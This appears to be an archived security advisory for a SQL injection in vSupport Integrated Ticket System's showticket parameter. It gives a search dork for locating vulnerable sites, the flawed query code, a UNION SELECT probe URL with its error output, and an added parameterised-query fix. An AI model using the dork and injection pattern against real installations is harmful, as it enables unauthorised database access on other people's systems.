vSupport Integrated Ticket System 3.*.* SQL injection

2007.06.14
Credit: rUnViRuS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Vendor ............: http://www.cmgsccc.com
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------

        // do not limit the users access
        $fromuseraccess = "";
}

// get the info about the ticket first
if ($ticket = $db->query_first("
        SELECT ticket.*
        " . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "
        FROM " . TABLE_PREFIX . "ticket as ticket
        " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . "
        WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
        $fromuseraccess
"))
{

+--------------------------------------------------------------------
+ An example:
+--------------------------------------------------------------------

http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/

+--------------------------------------------------------------------
+ output:
+--------------------------------------------------------------------

MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Error Number : 1064
Date : Monday, July 2nd 2007 @ 02:54:54 PM
Script : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer :
IP Address : 127.0.0.1
Username : admin
Classname : vb_database

Invalid SQL:
SELECT ticket.*
,icon.title AS icontitle, icon.iconpath
FROM ticket as ticket
LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
WHERE ticketid=1/**/union/**/select/**/;

+--------------------------------------------------------------------
+ Exploit :
+--------------------------------------------------------------------

http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]

+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------

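The root cause in the code above is that the request value for ticketid is concatenated into the WHERE clause as-is. The following is an added example, not code from vSupport or from the advisory: a hardened lookup that validates the id as a positive integer and binds it as a parameter. The helper names clean_ticket_id and fetch_ticket, the title column, and the in-memory SQLite table standing in for the MySQL ticket table are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper names; an in-memory SQLite database
// stands in for the application's MySQL ticket table.

// Accept the request value only if it parses as an integer >= 1.
function clean_ticket_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Fetch one ticket with the id bound as a parameter, never concatenated.
function fetch_ticket(PDO $db, $rawTicketId): ?array
{
    $id = clean_ticket_id($rawTicketId);
    if ($id === null) {
        return null; // rejected before any SQL is built
    }
    $stmt = $db->prepare('SELECT ticketid, title FROM ticket WHERE ticketid = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ticket (ticketid INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO ticket (ticketid, title) VALUES (1, 'Printer offline')");

// The second input is the probe string from the advisory's example URL.
foreach (['1', '1/**/union/**/select/**/', '-5', '2'] as $input) {
    $ticket = fetch_ticket($db, $input);
    printf("%-26s => %s\n", $input, $ticket ? $ticket['title'] : 'rejected or not found');
}
```

Only the first input returns a row; the advisory's probe string fails integer validation, so no query is issued and no database error text reaches the client.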


Copyright 2024, cxsecurity.com

 
